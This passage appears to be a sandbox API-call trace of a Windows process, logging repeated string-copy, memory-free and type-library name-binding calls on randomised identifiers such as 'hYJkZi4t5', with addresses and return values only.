_mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55718c2 | out: _Dst=0x343ddc) returned 0x0 [0061.019] CRetailMalloc_Free () returned 0x7940201 [0061.019] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55718e6 | out: _Dst=0x87fcc50) returned 0x0 [0061.019] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55718e6 | out: _Dst=0x343ddc) returned 0x0 [0061.019] CRetailMalloc_Free () returned 0x7940201 [0061.019] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557190a | out: _Dst=0x87fcc50) returned 0x0 [0061.019] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557190a | out: _Dst=0x343ddc) returned 0x0 [0061.020] CRetailMalloc_Free () returned 0x7940201 [0061.020] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557192e | out: _Dst=0x87fcc50) returned 0x0 [0061.020] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557192e | out: _Dst=0x343ddc) returned 0x0 [0061.020] CRetailMalloc_Free () returned 0x7940201 [0061.020] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571952 | out: _Dst=0x87fcc50) returned 0x0 [0061.020] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571952 | out: _Dst=0x343ddc) returned 0x0 [0061.020] CRetailMalloc_Free () returned 0x7940201 [0061.021] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x557197a | out: _Dst=0x87504e0) returned 0x0 [0061.021] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x557197a | out: _Dst=0x343ddc) returned 0x0 [0061.021] CRetailMalloc_Free () returned 0x1a060101 [0061.021] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55719a2 | out: _Dst=0x87fcc50) returned 0x0 [0061.022] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55719a2 | out: _Dst=0x343ddc) returned 0x0 [0061.022] CRetailMalloc_Free () returned 0x7940201 [0061.022] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55719c6 | out: _Dst=0x87fcc50) returned 0x0 [0061.022] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55719c6 | out: _Dst=0x343ddc) returned 0x0 [0061.022] CRetailMalloc_Free () returned 0x7940201 [0061.022] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55719ea | out: _Dst=0x87504e0) returned 0x0 [0061.023] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55719ea | out: _Dst=0x343ddc) returned 0x0 [0061.023] CRetailMalloc_Free () returned 0x1a060101 [0061.023] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571a12 | out: _Dst=0x87fcc50) returned 0x0 [0061.023] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571a12 | out: _Dst=0x343ddc) returned 0x0 [0061.023] CRetailMalloc_Free () returned 0x7940201 [0061.023] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571a36 | out: _Dst=0x87fcc50) returned 0x0 [0061.023] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571a36 | out: _Dst=0x343ddc) returned 0x0 [0061.024] CRetailMalloc_Free () returned 0x7940201 [0061.024] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571a5e | out: _Dst=0x87fcc50) returned 0x0 [0061.024] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571a5e | out: _Dst=0x343ddc) returned 0x0 [0061.024] CRetailMalloc_Free () returned 0x7940201 [0061.024] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571aae | out: _Dst=0x87fcc50) returned 0x0 [0061.025] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571aae | out: _Dst=0x343ddc) returned 0x0 [0061.025] CRetailMalloc_Free () returned 0x7940201 [0061.025] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571a86 | out: _Dst=0x87504e0) returned 0x0 [0061.025] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571a86 | out: _Dst=0x343ddc) returned 0x0 [0061.025] CRetailMalloc_Free () returned 0x1a060101 [0061.026] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571ad2 | out: _Dst=0x87fcc50) returned 0x0 [0061.026] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571ad2 | out: _Dst=0x343ddc) returned 0x0 [0061.026] CRetailMalloc_Free () returned 0x7940201 [0061.026] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571af6 | out: _Dst=0x87fcc50) returned 0x0 [0061.026] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571af6 | out: _Dst=0x343ddc) returned 0x0 [0061.026] CRetailMalloc_Free () returned 0x7940201 [0061.027] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571b1e | out: _Dst=0x87fcc50) returned 0x0 [0061.027] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571b1e | out: _Dst=0x343ddc) returned 0x0 [0061.027] CRetailMalloc_Free () returned 0x7940201 [0061.027] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571b42 | out: _Dst=0x87fcc50) returned 0x0 [0061.027] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571b42 | out: _Dst=0x343ddc) returned 0x0 [0061.027] CRetailMalloc_Free () returned 0x7940201 [0061.028] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571b66 | out: _Dst=0x87504e0) returned 0x0 [0061.028] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571b66 | out: _Dst=0x343ddc) returned 0x0 [0061.028] CRetailMalloc_Free () returned 0x1a060101 [0061.028] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571b8e | out: _Dst=0x87504e0) returned 0x0 [0061.028] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571b8e | out: _Dst=0x343ddc) returned 0x0 [0061.029] CRetailMalloc_Free () returned 0x1a060101 [0061.029] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571bb6 | out: _Dst=0x87fcc50) returned 0x0 [0061.029] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571bb6 | out: _Dst=0x343ddc) returned 0x0 [0061.029] CRetailMalloc_Free () returned 0x7940201 [0061.029] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571bde | out: _Dst=0x87fcc50) returned 0x0 [0061.029] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571bde | out: _Dst=0x343ddc) returned 0x0 [0061.029] CRetailMalloc_Free () returned 0x7940201 [0061.030] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571c02 | out: _Dst=0x87fcc50) returned 0x0 [0061.030] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571c02 | out: _Dst=0x343ddc) returned 0x0 [0061.030] CRetailMalloc_Free () returned 0x7940201 [0061.030] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571c26 | out: _Dst=0x87504e0) returned 0x0 [0061.030] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571c26 | out: _Dst=0x343ddc) returned 0x0 [0061.030] CRetailMalloc_Free () returned 0x1a060101 [0061.032] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571c4e | out: _Dst=0x87fcc50) returned 0x0 [0061.032] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571c4e | out: _Dst=0x343ddc) returned 0x0 [0061.032] CRetailMalloc_Free () returned 0x7940201 [0061.032] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571c72 | out: _Dst=0x87fcc50) returned 0x0 [0061.032] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571c72 | out: _Dst=0x343ddc) returned 0x0 [0061.033] CRetailMalloc_Free () returned 0x7940201 [0061.033] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571c96 | out: _Dst=0x87fcc50) returned 0x0 [0061.033] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571c96 | out: _Dst=0x343ddc) returned 0x0 [0061.033] CRetailMalloc_Free () returned 0x7940201 [0061.033] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571cba | out: _Dst=0x87fcc50) returned 0x0 [0061.033] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571cba | out: _Dst=0x343ddc) returned 0x0 [0061.034] CRetailMalloc_Free () returned 0x7940201 [0061.034] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571cde | out: _Dst=0x87fcc50) returned 0x0 [0061.034] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571cde | out: _Dst=0x343ddc) returned 0x0 [0061.034] CRetailMalloc_Free () returned 0x7940201 [0061.034] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571d26 | out: _Dst=0x87fcc50) returned 0x0 [0061.035] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571d26 | out: _Dst=0x343ddc) returned 0x0 [0061.035] CRetailMalloc_Free () returned 0x7940201 [0061.035] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571d02 | out: _Dst=0x87fcc50) returned 0x0 [0061.035] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571d02 | out: _Dst=0x343ddc) returned 0x0 [0061.035] CRetailMalloc_Free () returned 0x7940201 [0061.035] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571d4a | out: _Dst=0x87504e0) returned 0x0 [0061.036] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571d4a | out: _Dst=0x343ddc) returned 0x0 [0061.036] CRetailMalloc_Free () returned 0x1a060101 [0061.036] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571d72 | out: _Dst=0x87fcc50) returned 0x0 [0061.036] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571d72 | out: _Dst=0x343ddc) returned 0x0 [0061.036] CRetailMalloc_Free () returned 0x7940201 [0061.036] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571d96 | out: _Dst=0x87fcc50) returned 0x0 [0061.037] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571d96 | out: _Dst=0x343ddc) returned 0x0 [0061.037] CRetailMalloc_Free () returned 0x7940201 [0061.037] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571dba | out: _Dst=0x87fcc50) returned 0x0 [0061.037] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571dba | out: _Dst=0x343ddc) returned 0x0 [0061.037] CRetailMalloc_Free () returned 0x7940201 [0061.037] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571de2 | out: _Dst=0x87fcc50) returned 0x0 [0061.038] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571de2 | out: _Dst=0x343ddc) returned 0x0 [0061.038] CRetailMalloc_Free () returned 0x7940201 [0061.038] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571e06 | out: _Dst=0x87fcc50) returned 0x0 [0061.038] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571e06 | out: _Dst=0x343ddc) returned 0x0 [0061.038] CRetailMalloc_Free () returned 0x7940201 [0061.038] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5571e2a | out: _Dst=0x87fcc50) returned 0x0 [0061.039] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5571e2a | out: _Dst=0x343ddc) returned 0x0 [0061.039] CRetailMalloc_Free () returned 0x7940201 [0061.039] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571e4e | out: _Dst=0x87504e0) returned 0x0 [0061.039] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571e4e | out: _Dst=0x343ddc) returned 0x0 [0061.039] CRetailMalloc_Free () returned 0x1a060101 [0061.039] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571e9a | out: _Dst=0x87504e0) returned 0x0 [0061.040] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571e9a | out: _Dst=0x343ddc) returned 0x0 [0061.040] CRetailMalloc_Free () returned 0x1a060101 [0061.040] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5571e76 | out: _Dst=0x87fcc50) returned 0x0 [0061.040] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5571e76 | out: _Dst=0x343ddc) returned 0x0 [0061.040] CRetailMalloc_Free () returned 0x7940201 [0061.040] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571ec2 | out: _Dst=0x87fcc50) returned 0x0 [0061.041] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571ec2 | out: _Dst=0x343ddc) returned 0x0 [0061.041] CRetailMalloc_Free () returned 0x7940201 [0061.041] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571ee6 | out: _Dst=0x87504e0) returned 0x0 [0061.041] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571ee6 | out: _Dst=0x343ddc) returned 0x0 [0061.041] CRetailMalloc_Free () returned 0x1a060101 [0061.041] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571f0e | out: _Dst=0x87fcc50) returned 0x0 [0061.042] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571f0e | out: _Dst=0x343ddc) returned 0x0 [0061.042] CRetailMalloc_Free () returned 0x7940201 [0061.042] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571f36 | out: _Dst=0x87504e0) returned 0x0 [0061.042] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571f36 | out: _Dst=0x343ddc) returned 0x0 [0061.042] CRetailMalloc_Free () returned 0x1a060101 [0061.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571f5e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="hYJkZi4t5") returned 10 [0061.042] ITypeComp:RemoteBind (in: This=0x87ce890, szName="hYJkZi4t5", lHashVal=0x105012, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x6de | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x6de) returned 0x0 [0061.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571f5e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="hYJkZi4t5") returned 10 [0061.043] ITypeComp:RemoteBind (in: This=0x87ce668, szName="hYJkZi4t5", lHashVal=0x105012, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x6de | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x6de) returned 0x0 [0061.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5571f5e, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="hYJkZi4t5") returned 10 [0061.043] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="hYJkZi4t5", lHashVal=0x105012, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x6de | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x6de) returned 0x0 [0061.043] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571f5e | out: _Dst=0x87504e0) returned 0x0 [0061.043] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571f5e | out: _Dst=0x343ddc) returned 0x0 [0061.043] CRetailMalloc_Free () returned 0x1a060101 [0061.044] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571f86 | out: _Dst=0x87fcc50) returned 0x0 [0061.044] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571f86 | out: _Dst=0x343ddc) returned 0x0 [0061.044] CRetailMalloc_Realloc () returned 0x88a8460 [0061.044] CRetailMalloc_Free () returned 0x7940201 [0061.045] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5571faa | out: _Dst=0x87fcc50) returned 0x0 [0061.045] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5571faa | out: _Dst=0x343ddc) returned 0x0 [0061.045] CRetailMalloc_Free () returned 0x7940201 [0061.046] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5571fd2 | out: _Dst=0x87504e0) returned 0x0 [0061.046] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5571fd2 | out: _Dst=0x343ddc) returned 0x0 [0061.046] CRetailMalloc_Free () returned 0x1a060101 [0061.046] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5571ffa | out: _Dst=0x87fcc50) returned 0x0 [0061.046] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5571ffa | out: _Dst=0x343ddc) returned 0x0 [0061.046] CRetailMalloc_Free () returned 0x7940201 [0061.047] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557201e | out: _Dst=0x87fcc50) returned 0x0 [0061.047] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557201e | out: _Dst=0x343ddc) returned 0x0 [0061.047] CRetailMalloc_Free () returned 0x7940201 [0061.047] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5572042 | out: _Dst=0x87fcc50) returned 0x0 [0061.047] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5572042 | out: _Dst=0x343ddc) returned 0x0 [0061.047] CRetailMalloc_Free () returned 0x7940201 [0061.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557208e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="eGsyWcqz") returned 9 [0061.048] ITypeComp:RemoteBind (in: This=0x87ce890, szName="eGsyWcqz", lHashVal=0x10393e, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x6ee | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x6ee) returned 0x0 [0061.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557208e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="eGsyWcqz") returned 9 [0061.048] ITypeComp:RemoteBind (in: This=0x87ce668, szName="eGsyWcqz", lHashVal=0x10393e, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x6ee | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x6ee) returned 0x0 [0061.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557208e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="eGsyWcqz") returned 9 [0061.048] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="eGsyWcqz", lHashVal=0x10393e, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x6ee | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x6ee) returned 0x0 [0061.048] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557208e | out: _Dst=0x87fcc50) returned 0x0 [0061.048] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557208e | out: _Dst=0x343ddc) returned 0x0 [0061.049] CRetailMalloc_Free () returned 0x7940201 [0061.049] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5572066 | out: _Dst=0x87504e0) returned 0x0 [0061.049] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5572066 | out: _Dst=0x343ddc) returned 0x0 [0061.049] CRetailMalloc_Free () returned 0x1a060101 [0061.049] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55720b6 | out: _Dst=0x87fcc50) returned 0x0 [0061.049] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55720b6 | out: _Dst=0x343ddc) returned 0x0 [0061.049] CRetailMalloc_Free () returned 0x7940201 [0061.050] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55720da | out: _Dst=0x87fcc50) returned 0x0 [0061.050] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55720da | out: _Dst=0x343ddc) returned 0x0 [0061.050] CRetailMalloc_Free () returned 0x7940201 [0061.050] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x55720fe | out: _Dst=0x87fcc50) returned 0x0 [0061.051] IUnknown:Release (This=0x87ce888) returned 0x8 [0061.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xacf001a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_XHFxU9R") returned 15 [0061.051] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_XHFxU9R", lHashVal=0x10cf1d, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0061.051] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x55720fe | out: _Dst=0x343ddc) returned 0x0 [0061.051] CRetailMalloc_Free () returned 0x7940201 [0061.051] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5572122 | out: _Dst=0x87fcc50) returned 0x0 [0061.051] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5572122 | out: _Dst=0x343ddc) returned 0x0 [0061.051] CRetailMalloc_Free () returned 0x7940201 [0061.052] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5572146 | out: _Dst=0x87504e0) returned 0x0 [0061.052] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5572146 | out: _Dst=0x343ddc) returned 0x0 [0061.052] CRetailMalloc_Free () returned 0x1a060101 [0061.052] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x557216e | out: _Dst=0x87fcc50) returned 0x0 [0061.052] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x557216e | out: _Dst=0x343ddc) returned 0x0 [0061.052] CRetailMalloc_Free () returned 0x7940201 [0061.053] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5572192 | out: _Dst=0x87fcc50) returned 0x0 [0061.053] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5572192 | out: _Dst=0x343ddc) returned 0x0 [0061.053] CRetailMalloc_Free () returned 0x7940201 [0061.053] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x55721b6 | out: _Dst=0x87fcc50) returned 0x0 [0061.053] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x55721b6 | out: _Dst=0x343ddc) returned 0x0 [0061.053] CRetailMalloc_Free () returned 0x7940201 [0061.054] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55721da | out: _Dst=0x87504e0) returned 0x0 [0061.054] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55721da | out: _Dst=0x343ddc) returned 0x0 [0061.054] CRetailMalloc_Free () returned 0x1a060101 [0061.054] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5572202 | out: _Dst=0x87fcc50) returned 0x0 [0061.054] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5572202 | out: _Dst=0x343ddc) returned 0x0 [0061.054] CRetailMalloc_Free () returned 0x7940201 [0061.055] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5572226 | out: _Dst=0x87504e0) returned 0x0 [0061.055] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5572226 | out: _Dst=0x343ddc) returned 0x0 [0061.055] CRetailMalloc_Free () returned 0x1a060101 [0061.055] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x557224e | out: _Dst=0x87fcc50) returned 0x0 [0061.055] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x557224e | out: _Dst=0x343ddc) returned 0x0 [0061.056] CRetailMalloc_Free () returned 0x7940201 [0061.056] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5572272 | out: _Dst=0x87fcc50) returned 0x0 [0061.056] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5572272 | out: _Dst=0x343ddc) returned 0x0 [0061.056] CRetailMalloc_Free () returned 0x7940201 [0061.056] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5572296 | out: _Dst=0x87504e0) returned 0x0 [0061.057] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5572296 | out: _Dst=0x343ddc) returned 0x0 [0061.057] CRetailMalloc_Free () returned 0x1a060101 [0061.057] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55722be | out: _Dst=0x87fcc50) returned 0x0 [0061.057] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55722be | out: _Dst=0x343ddc) returned 0x0 [0061.057] CRetailMalloc_Free () returned 0x7940201 